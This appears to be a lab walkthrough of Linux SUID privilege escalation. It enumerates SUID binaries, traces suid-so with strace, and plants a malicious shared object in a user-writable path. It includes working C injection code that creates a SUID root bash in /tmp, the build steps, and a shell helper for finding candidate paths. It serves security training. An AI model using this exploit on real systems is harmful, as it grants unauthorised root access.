How to find SUID binaries (the setuid bit is octal 04000, so -perm -04000 matches any file that has it set; 2>/dev/null hides permission-denied noise from directories we cannot read):
find / -type f -perm -04000 -ls 2>/dev/null
result:
809081 40 -rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh
812578 172 -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo
810173 36 -rwsr-xr-x 1 root root 32808 Feb 15 2011 /usr/bin/newgrp
812578 172 -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudoedit
809080 44 -rwsr-xr-x 1 root root 43280 Jun 18 2020 /usr/bin/passwd
809078 64 -rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd
809077 40 -rwsr-xr-x 1 root root 39856 Feb 15 2011 /usr/bin/chfn
816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so
816762 8 -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
816764 8 -rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2
815723 948 -rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3
832517 8 -rwsr-xr-x 1 root root 6776 Dec 19 2010 /usr/lib/eject/dmcrypt-get-device
832743 212 -rwsr-xr-x 1 root root 212128 Apr 2 2014 /usr/lib/openssh/ssh-keysign
812623 12 -rwsr-xr-x 1 root root 10592 Feb 15 2016 /usr/lib/pt_chown
473324 36 -rwsr-xr-x 1 root root 36640 Oct 14 2010 /bin/ping6
473323 36 -rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping
473292 84 -rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount
473312 36 -rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su
473290 60 -rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount
465223 100 -rwsr-xr-x 1 root root 94992 Dec 13 2014 /sbin/mount.nfs
SO Injection
This one is suid-so. Why? It is SUID root (-rwsr-sr-x, owned by root), it lives in /usr/local/bin rather than coming from a distro package, and the name suggests it loads a shared object (.so) at run time. If it loads that object from a path we can write to, whatever we put there runs as root.
/usr/local/bin/suid-so
strace: traces the system calls a program makes, so we can watch which files it tries to open and which ones are missing. The kernel ignores the SUID bit when a binary is run under a tracer, so the traced run executes as our own user; that is fine here because we only want to see the paths.
how to strace? (2>&1 is needed because strace writes its trace to stderr)
strace /usr/local/bin/suid-so 2>&1
The output shows the program looking for several files that do not exist.
cleaner output (keep only the file lookups and the failures):
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
We can see which files the program tries to open and does not find. If one of those paths sits in a directory we can write to, we can create the file ourselves and the program will load our code with its root privileges.
for example:
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
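To automate the step just shown (pull the ENOENT paths out of a trace, then find the nearest directory that actually exists so its permissions can be checked), here is an added POSIX shell helper. It is not part of the original notes; it embeds a constructed subset of the strace lines above as sample input, and in practice you would feed it the real output of `strace <binary> 2>&1`.

```shell
#!/bin/sh
# Added helper (not from the original notes): find paths a traced program
# failed to open and report the ones we could create ourselves.

# Constructed sample: a subset of the strace lines shown above.
SAMPLE='access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)'

# Print each distinct path whose syscall in the trace returned ENOENT.
# Argument: the trace text (what `strace prog 2>&1` prints).
missing_paths() {
    printf '%s\n' "$1" \
        | grep 'ENOENT' \
        | sed -n 's/^[a-z_0-9]*("\([^"]*\)".*/\1/p' \
        | sort -u
}

# Walk up from a path that does not exist to the closest ancestor that does.
nearest_existing() {
    p=$1
    while [ ! -e "$p" ] && [ "$p" != "/" ]; do
        p=$(dirname "$p")
    done
    printf '%s\n' "$p"
}

# Print the nearest existing ancestor if we can create entries in it,
# otherwise print nothing and return 1. Missing intermediate directories
# (like .config above) do not matter: we can mkdir them ourselves.
writable_parent() {
    d=$(nearest_existing "$1")
    if [ -w "$d" ] && [ -x "$d" ]; then
        printf '%s\n' "$d"
        return 0
    fi
    return 1
}

# Report every ENOENT path whose creation point is writable by us.
report() {
    missing_paths "$1" | while IFS= read -r path; do
        if d=$(writable_parent "$path"); then
            printf 'CANDIDATE %s (can create under %s)\n' "$path" "$d"
        fi
    done
}

# Usage with the constructed sample; with real input:
#   report "$(strace /usr/local/bin/suid-so 2>&1)"
report "$SAMPLE"
```

Run as the unprivileged user, the /etc misses drop out because /etc is root-owned, and only paths whose first existing ancestor is writable (here the home directory) are printed as candidates.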
The misses under /etc (suid-debug, ld.so.nohwcap, ld.so.preload) are in a root-owned directory, so we cannot create them. The interesting one is the last line: /home/user/.config/libcalc.so. Check whether it exists, then walk up until something does:
ls -la /home/user/.config/libcalc.so
no such file or directory
ls -la /home/user/.config
no such file or directory
ls -la /home/user/
This is our user's home folder and we have write access to it, so we can create the missing directory and the missing .so ourselves and put code in it that escalates privileges. Note that this is not an LD_PRELOAD trick (the loader ignores LD_PRELOAD for SUID binaries): the program opens this path on its own, after libc is already loaded, and a hard-coded path under a user-writable directory is what makes it exploitable.
#include <stdio.h>
#include <stdlib.h>

/* Runs automatically when the shared object is loaded, before the program
   calls anything in it, so we do not need to know which symbols it expects. */
static void inject() __attribute__((constructor));

void inject() {
    /* Copy bash, mark the copy SUID/SGID (we are euid 0 here, so the copy is
       root-owned), then start it with -p so bash keeps the effective UID. */
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
We copy bash to /tmp, give the copy the setuid and setgid bits (chmod +s sets both) and run it with -p, which stops bash from dropping the effective UID back to our real UID. This relies on /bin/sh, which system() uses, not dropping privileges itself: dash (the default on Debian-based systems) keeps them; if /bin/sh is bash, call setuid(0) before system() or the shell falls back to our real UID.
In this case we create the folder and the file:
cd /home/user/
mkdir .config
nano libcalc.c
(paste the code above, then ctrl+x and y to save and exit)
Compile it as a shared object (-shared produces a .so, -fPIC is required for shared code):
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c
Then run suid-so again; when it loads libcalc.so the constructor runs as root and we land in /tmp/bash -p:
/usr/local/bin/suid-so
Confirm with id (euid=0(root)) and ls -l /tmp/bash (-rwsr-sr-x, owned by root).